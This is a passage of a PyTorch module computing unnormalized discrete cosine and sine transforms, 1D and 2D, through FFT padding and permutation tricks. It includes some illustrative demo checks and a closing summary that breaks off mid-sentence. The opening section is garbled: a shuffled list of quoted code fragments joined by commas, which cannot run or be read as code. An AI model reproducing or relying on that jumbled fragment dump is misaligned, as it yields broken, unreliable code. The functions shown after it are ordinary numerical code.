@param expk1 with", "def idct_N(x, expk=None): N = x.size(-1) if expk is None:", "1/2 * (sin(a+b) + sin(a-b)) cos(a) sin(b) = 1/2 *", "without normalization to coefficients. Compute 1D DCT twice. @param x", "Sine-Cosine Transformation without normalization to coefficients. Compute idxst(idct(x)) @param x", "return expk.contiguous() def get_expkp1(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)), but", "torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N) if len(x.size()) == 1:", "# pad last dimension x_pad = F.pad(x, (0, N), 'constant',", "DCT. @param x batch tensor, the 2D part is MxN", "without normalization to coefficients. Compute y_u = \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)),", "numbers introduce a new dimension # Must use IFFT here", "the 2D part is MxN @param expkp1_0 with length M", "cos(pi/N*q*(v+0.5)) Compute 1D DCT twice. @param x batch tensor, the", "2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1 \"\"\" perm = torch.zeros(N,", "\"\"\" Batch 2D Discrete Cosine Transformation without normalization to coefficients.", "v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))). 
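# Illustrative example (not part of the original module): for N = 6 the
# permutation maps [0, 1, 2, 3, 4, 5] to [0, 2, 4, 5, 3, 1], i.e.
# [a, b, c, d, e, f] becomes [a, c, e, f, d, b], as consumed by dct_N below.
def _demo_get_perm():
    perm6 = get_perm(6, dtype=torch.int64, device=torch.device("cpu"))
    assert perm6.tolist() == [0, 2, 4, 5, 3, 1]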
def dct_2N(x, expk=None):
    """ Batch Discrete Cosine Transformation without normalization to coefficients.
    Compute y_u = \sum_i x_i cos(pi*(2i+1)*u/(2N)).
    Implements the 2N padding trick to solve DCT with FFT in the following link,
    https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft

    1. Pad x by zeros
    2. Perform FFT
    3. Multiply by 2*exp(-1j*pi*u/(2N))
    4. Extract the real part
    """
    # last dimension
    N = x.size(-1)
    # pad last dimension
    x_pad = F.pad(x, (0, N), 'constant', 0)
    # the last dimension here becomes -2 because complex numbers introduce a new dimension
    y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :]
    y.mul_(1.0/N)
    if expk is None:
        expk = get_expk(N, dtype=x.dtype, device=x.device)
    # get real part
    y.mul_(expk)
    # I found add is much faster than sum
    #y = y.sum(dim=-1)
    return y[..., 0] + y[..., 1]
def dct_N(x, perm=None, expk=None):
    """ Batch Discrete Cosine Transformation without normalization to coefficients.
    Compute y_u = \sum_i x_i cos(pi*(2i+1)*u/(2N)).
    Implements the N permuting trick to solve DCT with FFT in the following link,
    https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft

    1. permute x such that [a, b, c, d, e, f] becomes [a, c, e, f, d, b]
    2. Perform FFT
    3. Multiply by 2*exp(-1j*pi*u/(2N))
    4. Extract the real part
    """
    # last dimension
    N = x.size(-1)
    if perm is None:
        perm = get_perm(N, dtype=torch.int64, device=x.device)
    if x.ndimension() <= 1:
        x_reorder = x.view([1, N])
    else:
        x_reorder = x.clone()
    # switch from row-major to column-major for speedup
    x_reorder.transpose_(dim0=-2, dim1=-1)
    #x_reorder = x_reorder[..., perm, :]
    x_reorder = x_reorder.index_select(dim=-2, index=perm)
    # switch back
    x_reorder.transpose_(dim0=-2, dim1=-1)
    y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :]
    y.mul_(1.0/N)
    if expk is None:
        expk = get_expk(N, dtype=x.dtype, device=x.device)
    # get real part
    y.mul_(expk)
    # I found add is much faster than sum
    #y = y.sum(dim=-1)
    return y[..., 0] + y[..., 1]
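# Consistency sketch (illustrative): dct_2N and dct_N implement the same
# transform via the 2N-padding and N-permuting tricks respectively, so they
# should agree to floating-point tolerance.
def _demo_dct_consistency():
    x = torch.randn(4, 8, dtype=torch.float64)
    assert torch.allclose(dct_2N(x), dct_N(x), atol=1e-10)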
def idct_2N(x, expk=None):
    """ Batch Inverse Discrete Cosine Transformation without normalization to coefficients.
    Compute y_u = \sum_i x_i cos(pi*(2u+1)*i/(2N)).
    Implements the 2N padding trick to solve IDCT with IFFT in the following link,
    https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py

    1. Multiply by 2*exp(1j*pi*u/(2N))
    2. Pad x by zeros
    3. Perform IFFT
    4. Extract the real part
    """
    # last dimension
    N = x.size(-1)
    if expk is None:
        expk = get_expk(N, dtype=x.dtype, device=x.device)
    # multiply by 2*exp(1j*pi*u/(2N))
    x_pad = x.unsqueeze(-1).mul(expk)
    # pad second last dimension, excluding the complex number dimension
    x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)
    if len(x.size()) == 1:
        x_pad.unsqueeze_(0)
    # the last dimension here becomes -2 because complex numbers introduce a new dimension
    y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N]
    y.mul_(N)
    if len(x.size()) == 1:
        y.squeeze_(0)
    return y


def idct_N(x, expk=None):
    N = x.size(-1)
    if expk is None:
        expk = get_expk(N, dtype=x.dtype, device=x.device)
    size = list(x.size())
    size.append(2)
    x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device)
    x_reorder[..., 0] = x
    x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1)
    x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1]))
    x_reorder[..., 1].mul_(expk[..., 0])
    x_reorder[..., 1].add_(x.mul(expk[..., 1]))
    # this is to match idct_2N;
    # the normal way should multiply 0.25
    x_reorder.mul_(0.5)
    y = torch.ifft(x_reorder, signal_ndim=1, normalized=False)
    y.mul_(N)
    z = torch.empty_like(x)
    z[..., 0:N:2] = y[..., :(N+1)//2, 0]
    z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1])
    return z
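# Consistency sketch (illustrative): idct_N scales itself "to match idct_2N"
# per the comment above, so the two inverse variants should agree.
def _demo_idct_consistency():
    x = torch.randn(4, 8, dtype=torch.float64)
    assert torch.allclose(idct_2N(x), idct_N(x), atol=1e-10)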
def dst(x, expkp1=None):
    """ Batch Discrete Sine Transformation without normalization to coefficients.
    Compute y_u = \sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)).
    Implements the 2N padding trick to solve DST with FFT in the following link,
    https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft

    1. Pad x by zeros
    2. Perform FFT
    3. Multiply by 2*exp(-1j*pi*(u+1)/(2N))
    4. Extract the imaginary part
    """
    # last dimension
    N = x.size(-1)
    # pad last dimension
    x_pad = F.pad(x, (0, N), 'constant', 0)
    # the last dimension here becomes -2 because complex numbers introduce a new dimension
    y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :]
    if expkp1 is None:
        expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)
    # get imag part
    y = y[..., 1].mul(expkp1[:, 0]) - y[..., 0].mul(expkp1[:, 1])
    return y


def idst(x, expkp1=None):
    """ Batch Inverse Discrete Sine Transformation without normalization to coefficients.
    Implements the 2N padding trick to solve IDST with IFFT in the following link,
    https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py

    1. Multiply by 2*exp(1j*pi*(u+1)/(2N))
    2. Pad x by zeros
    3. Perform IFFT
    4. Extract the real part
    """
    # last dimension
    N = x.size(-1)
    if expkp1 is None:
        expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)
    # multiply by 2*exp(1j*pi*(u+1)/(2N))
    x_pad = x.unsqueeze(-1).mul(expkp1)
    # pad second last dimension, excluding the complex number dimension
    x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)
    if len(x.size()) == 1:
        x_pad.unsqueeze_(0)
    # the last dimension here becomes -2 because complex numbers introduce a new dimension
    y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1]
    y.mul_(N)
    if len(x.size()) == 1:
        y.squeeze_(0)
    return y
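# Shape sketch for the sine pair (illustrative only; dst/idst carry this
# module's own scaling conventions, so no exact round-trip identity is claimed):
def _demo_dst_shapes():
    x = torch.randn(4, 8, dtype=torch.float64)
    y = dst(x)
    xr = idst(y)
    assert y.shape == x.shape and xr.shape == x.shape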
def idxt(x, cos_or_sin_flag, expk=None):
    """ Batch Inverse Discrete Cosine Transformation without normalization to coefficients.
    Compute y_u = \sum_i x_i cos(pi*(2u+1)*i/(2N)).
    Implements the 2N padding trick to solve IDCT with IFFT in the following link,
    https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py

    1. Multiply by 2*exp(1j*pi*u/(2N))
    2. Pad x by zeros
    3. Perform IFFT
    4. Extract the real part

    @param x batch 1D tensor for conversion
    @param cos_or_sin_flag 0 for cosine transformation and 1 for sine transformation
    @param expk 2*exp(j*pi*k/(2N))
    """
    # last dimension
    N = x.size(-1)
    if expk is None:
        expk = get_expk(N, dtype=x.dtype, device=x.device)
    # multiply by 2*exp(1j*pi*u/(2N))
    x_pad = x.unsqueeze(-1).mul(expk)
    # pad second last dimension, excluding the complex number dimension
    x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)
    if len(x.size()) == 1:
        x_pad.unsqueeze_(0)
    # the last dimension here becomes -2 because complex numbers introduce a new dimension
    # Must use IFFT here
    y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag]
    y.mul_(N)
    if len(x.size()) == 1:
        y.squeeze_(0)
    return y
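# The two inverse kernels share one implementation: idxt(x, 0, expk) picks the
# real (cosine) component of the IFFT and idxt(x, 1, expk) the imaginary (sine)
# component. A minimal sketch (illustrative; if I read both code paths right,
# flag 0 should reproduce idct_2N up to rounding):
def _demo_idxt_flag():
    x = torch.randn(8, dtype=torch.float64)
    assert torch.allclose(idxt(x, 0), idct_2N(x), atol=1e-10)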
def dct2_2N(x, expk0=None, expk1=None):
    """ Batch 2D Discrete Cosine Transformation without normalization to coefficients.
    Compute 1D DCT twice.
    @param x batch tensor, the 2D part is MxN
    @param expk0 with length M
    @param expk1 with length N
    """
    return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)


def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None):
    """ Batch 2D Discrete Cosine Transformation without normalization to coefficients.
    Compute 1D DCT twice.
    @param x batch tensor, the 2D part is MxN
    @param perm0 with length M
    @param expk0 with length M
    @param perm1 with length N
    @param expk1 with length N
    """
    return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1)


def idct2_2N(x, expk0=None, expk1=None):
    """ Batch 2D Inverse Discrete Cosine Transformation without normalization to coefficients.
    Compute 1D IDCT twice.
    @param x batch tensor, the 2D part is MxN
    @param expk0 with length M
    @param expk1 with length N
    """
    return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)


def idct2_N(x, expk0=None, expk1=None):
    """ Batch 2D Inverse Discrete Cosine Transformation without normalization to coefficients.
    Compute 1D IDCT twice.
    @param x batch tensor, the 2D part is MxN
    @param expk0 with length M
    @param expk1 with length N
    """
    return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)
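# 2D sketch: the 2D transforms are separable, so each is a 1D transform along
# one axis, a transpose, the 1D transform along the other axis, and a transpose
# back. Illustrative check that both DCT variants also agree in 2D:
def _demo_dct2():
    x = torch.randn(4, 8, dtype=torch.float64)
    assert torch.allclose(dct2_2N(x), dct2_N(x), atol=1e-10)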
def dst2(x, expkp1_0=None, expkp1_1=None):
    """ Batch 2D Discrete Sine Transformation without normalization to coefficients.
    Compute 1D DST twice.
    @param x batch tensor, the 2D part is MxN
    @param expkp1_0 with length M
    @param expkp1_1 with length N
    """
    return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1)


def idcct2(x, expk_0=None, expk_1=None):
    """ Batch 2D Inverse Discrete Cosine-Cosine Transformation without normalization to coefficients.
    It computes the following equation, which is slightly different from the standard DCT formulation.
    y_{u, v} = \sum_p \sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))
    Compute 1D IDCT twice.
    @param x batch tensor, the 2D part is MxN
    @param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
    @param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
    """
    return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1)
    # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)
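# The expk_* arguments exist so the twiddle factors can be computed once and
# reused across many calls. A sketch of that caching pattern (the helper name
# is illustrative, not part of the original module):
def _demo_precomputed_expk(M=4, N=8):
    x = torch.randn(M, N, dtype=torch.float64)
    expk_M = get_expk(M, dtype=x.dtype, device=x.device)
    expk_N = get_expk(N, dtype=x.dtype, device=x.device)
    return idcct2(x, expk_M, expk_N)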
def idsct2(x, expk_0=None, expk_1=None):
    """ Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization to coefficients.
    It computes the following equation, which is slightly different from the standard DCT formulation.
    y_{u, v} = \sum_p \sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))
    Compute 1D DST and then 1D DCT.
    @param x batch tensor, the 2D part is MxN
    @param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
    @param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
    """
    return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1)
    # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)


def idcst2(x, expk_0=None, expk_1=None):
    """ Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to coefficients.
    It computes the following equation, which is slightly different from the standard DCT formulation.
    y_{u, v} = \sum_p \sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5))
    Compute 1D DCT and then 1D DST.
    @param x batch tensor, the 2D part is MxN
    @param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
    @param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
    """
    return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1)
    # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1)
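# Note the argument order in the two functions above: the inner idxt runs on
# the last (length-N) axis with expk_1, the outer on the length-M axis with
# expk_0; the commented-out returns are the equivalent transpose-first forms.
# Shape sketch (illustrative):
def _demo_idsct2_idcst2_shapes():
    x = torch.randn(4, 8, dtype=torch.float64)
    assert idsct2(x).shape == x.shape and idcst2(x).shape == x.shape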
Pad x by", "y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y def idxt(x,", "x.size(-1) if expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device)", "\"\"\" def get_expk(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not", "cos(a) sin(b) = 1/2 * (sin(a-b) - sin(a+b)) A 2D", "x_pad.unsqueeze_(0) # the last dimension here becomes -2 because complex", "def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None): \"\"\" Batch 2D Discrete", "0:N, cos_or_sin_flag] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y", "expk = get_expk(N, dtype=x.dtype, device=x.device) size = list(x.size()) size.append(2) x_reorder", "functions to sums. sin(a) sin(b) = 1/2 * (cos(a-b) -", "have (u*i/M - v*j/N) inside exp. This will enable us", "dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1) def idct2_2N(x, expk0=None,", "the real part requires subtraction # this will be easier", "def idxt(x, cos_or_sin_flag, expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation", "expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation without normalization to", "is None: expk = get_expk(N, dtype=x.dtype, device=x.device) # multiply by", "complex number dimension x_pad = F.pad(x_pad, (0, 0, 0, N),", "q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT and then 1D DST.", "perm1=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation without normalization", "Inverse Discrete Sine-Cosine Transformation without normalization to coefficients. Compute idxst(idct(x))", "length M @param expk1 with length N \"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2,", "Cosine Transformation without normalization to coefficients. Compute 1D DCT twice.", "N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2,", "the real part @param x batch 1D tensor for conversion", "x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[..., 0] = x x_reorder[...,", "else: x_reorder = x.clone() # switch from row-major to column-major", "dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos # I swap -cos", "The math here mainly uses Prosthaphaeresis properties. The trigonometric identities", "z def dst(x, expkp1=None): \"\"\" Batch Discrete Sine Transformation without", "\"\"\" Compute permutation to generate following array 0, 2, 4,", "part \"\"\" # last dimension N = x.size(-1) if perm", "by zeros 3. Perform IFFT 4. Extract the real part", "== 1: y.squeeze_(0) return y def dct2_2N(x, expk0=None, expk1=None): \"\"\"", "normalization to coefficients. Compute idxst(idct(x)) @param x batch tensor, the", "length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0,", "from row-major to column-major for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder =", "perm=None, expk=None): \"\"\" Batch Discrete Cosine Transformation without normalization to", "by prosthaphaeresis relate products of trigonometric functions to sums. sin(a)", "expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idct_N(idxt(x, 1, expk_1).transpose_(dim0=-2,", "x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT and then 1D", "idsct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Sine-Cosine Transformation", "dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def idxst_idct(x, expk_0=None, expk_1=None):", "leveraging fast fourier transform engine. 
The math here mainly uses", "Transformation without normalization to coefficients. It computes following equation, which", "coefficients. Compute 1D DST twice. @param x batch tensor, the", "N = x.size(-1) if expkp1 is None: expkp1 = get_expkp1(N,", "2D part is MxN @param expk_0 with length M, 2*exp(-1j*pi*k/(2M))", "sin(b) = 1/2 * (cos(a-b) - cos(a+b)) cos(a) cos(b) =", "Batch Discrete Sine Transformation without normalization to coefficients. Compute y_u", "from standard DCT formulation. y_{u, v} = \\sum_p \\sum_q x_{p,", "onesided=False)[..., 0:N, :] y.mul_(1.0/N) if expk is None: expk =", "N \"\"\" return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dst2(x,", "idct_2N # normal way should multiply 0.25 x_reorder.mul_(0.5) y =", "1. permute x such that [a, b, c, d, e,", "Multiply by 2*exp(1j*pi*u/(2N)) 2. Pad x by zeros 3. Perform", "expkp1_1=None): \"\"\" Batch 2D Discrete Sine Transformation without normalization to", "None: expk = get_expk(N, dtype=x.dtype, device=x.device) # get real part", "standard DCT formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q}", "x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[..., 0])", "dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1)", "perm def dct_2N(x, expk=None): \"\"\" Batch Discrete Cosine Transformation without", "pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk", "part is MxN @param expk0 with length M @param expk1", "and then 1D DCT. @param x batch tensor, the 2D", "## # @file discrete_spectral_transform.py # @author <NAME> # @date Jun", "coefficients. Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the 2N", "Transformation without normalization to coefficients. Compute 1D DCT twice. @param", "expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1,", "for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[..., perm, :] x_reorder", "dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def idct2_N(x, expk0=None, expk1=None): \"\"\" Batch", "y_{u, v} = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) =", "b] 2. Perform FFT 3. Multiply by 2*exp(-1j*pi*u/(2N)) 4. Extract", "pad second last dimension, excluding the complex number dimension x_pad", "DCT formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5))", "1])) x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[..., 1])) # this is", "dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None):", "batch 1D tensor for conversion @param cos_or_sin_flag 0 for cosine", "1/2 * (sin(a-b) - sin(a+b)) A 2D FFT performs y_{u,", "DCT twice. @param x batch tensor, the 2D part is", "https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x by zeros 2. Perform FFT 3.", "is slightly different from standard DCT formulation. y_{u, v} =", "x.view([1, N]) else: x_reorder = x.clone() # switch from row-major", "def get_exact_expk(N, dtype, device): # Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) -", "0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1),", "Multiply by 2*exp(-1j*pi*u/(2N)) 4. 
Extract the real part \"\"\" #", "use sin because the real part requires subtraction # this", "part is MxN @param expkp1_0 with length M @param expkp1_1", "Discrete Sine-Cosine Transformation without normalization to coefficients. Compute idxst(idct(x)) @param", "y[..., :(N+1)//2, 0] z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return", "trigonometric functions to sums. sin(a) sin(b) = 1/2 * (cos(a-b)", "way should multiply 0.25 x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1, normalized=False)", "and 1 or sine transformation @param expk 2*exp(j*pi*k/(2N)) \"\"\" #", "2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expk) # pad second last dimension, excluding", "0] z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z def", "expk0).transpose_(dim0=-2, dim1=-1), expk1) def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None): \"\"\"", "trick to solve IDCT with IFFT in the following link,", "need the imag part # this will be easier for", "# last dimension N = x.size(-1) if expkp1 is None:", "'constant', 0) if len(x.size()) == 1: x_pad.unsqueeze_(0) # the last", "complex numbers introduce a new dimension y = torch.irfft(x_pad, signal_ndim=1,", "y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y def idct_N(x,", "with length N \"\"\" return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)", "following equation, which is slightly different from standard DCT formulation.", "requires subtraction # this will be easier for multiplication expk", "device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1)", "-cos and sin because we need the imag part #", "1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[...,", "dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device) return", "@param expk0 with length M @param expk1 with length N", "= x_reorder[..., perm, :] x_reorder = x_reorder.index_select(dim=-2, index=perm) # switch", "device=x.device) size = list(x.size()) size.append(2) x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device)", "N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2,", "(N+1)//2:, 0].flip([x.ndimension()-1]) return z def dst(x, expkp1=None): \"\"\" Batch Discrete", "numpy as np import torch import torch.nn.functional as F import", "for cosine tranformation and 1 or sine transformation @param expk", "def dst2(x, expkp1_0=None, expkp1_1=None): \"\"\" Batch 2D Discrete Sine Transformation", "The actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This will make later", "expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D", "length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1,", "0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1", "z[..., 0:N:2] = y[..., :(N+1)//2, 0] z[..., 1:N:2] = y[...,", "to coefficients. 
Compute idxst(idct(x)) @param x batch tensor, the 2D", "@param x batch 1D tensor for conversion @param cos_or_sin_flag 0", "sin because we need the imag part # this will", "dimension x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)", "cos(pi*u/(2N)) - j * sin(pi*u/(2N)) pik_by_2N = torch.arange(N, dtype=dtype, device=device)", "y_{u, v} = \\sum_p \\sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute", "return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def idxst_idct(x,", "= torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[..., 0] = x x_reorder[..., 1:,", "formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))", "0) if len(x.size()) == 1: x_pad.unsqueeze_(0) # the last dimension", "math here mainly uses Prosthaphaeresis properties. The trigonometric identities exploited", "idst(x, expkp1=None): \"\"\" Batch Inverse Discrete Sine Transformation without normalization", "switch back x_reorder.transpose_(dim0=-2, dim1=-1) y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[...,", "# Must use IFFT here y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[...,", "1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[...,", "= x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1]))", "to coefficients. Compute idct(idxst(x)). @param x batch tensor, the 2D", "(i, j) to (i, N-j), we can have (u*i/M -", "without normalization to coefficients. It computes following equation, which is", "\"\"\" Batch Inverse Discrete Sine Transformation without normalization to coefficients.", "expk.contiguous() def get_perm(N, dtype, device): \"\"\" Compute permutation to generate", "cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DCT twice. @param x batch tensor,", "if expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device) size", "excluding the complex number dimension x_pad = F.pad(x_pad, (0, 0,", "4. Extract the real part @param x batch 1D tensor", "complex numbers introduce a new dimension y = torch.rfft(x_pad, signal_ndim=1,", "switch from row-major to column-major for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder", "N), 'constant', 0) # the last dimension here becomes -2", "real part requires subtraction # this will be easier for", "the 2D part is MxN @param expk_0 with length M,", "exactly the same. The actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\"", "normalization to coefficients. 
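The forward padding trick is easiest to see in a few lines. Below is a minimal
NumPy sketch of the dct_2N recipe (the original uses the old torch.rfft API
and folds the factor 2 into its precomputed expk table; dct_2N_sketch and the
brute-force check are illustrative, not part of the module):

    import numpy as np

    def dct_2N_sketch(x):
        # Unnormalized DCT-II via the 2N padding trick:
        # y_u = sum_i x_i * cos(pi*(2i+1)*u/(2N))
        N = x.shape[-1]
        x_pad = np.concatenate([x, np.zeros_like(x)], axis=-1)  # 1. pad to 2N
        X = np.fft.fft(x_pad, axis=-1)[..., :N]                 # 2. FFT, keep N bins
        u = np.arange(N)
        return (X * np.exp(-1j * np.pi * u / (2 * N))).real     # 3.-4. twiddle, real part

    # brute-force check against the defining sum
    x = np.random.default_rng(0).standard_normal(8)
    i = np.arange(8)
    ref = np.array([(x * np.cos(np.pi * (2 * i + 1) * u / 16)).sum() for u in range(8)])
    assert np.allclose(dct_2N_sketch(x), ref)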
Inverse transforms (all unnormalized):
  - idct_2N(x): y_u = \sum_i x_i cos(pi*(2u+1)*i/(2N)). Implements the 2N
    padding trick to solve the IDCT with an IFFT, following
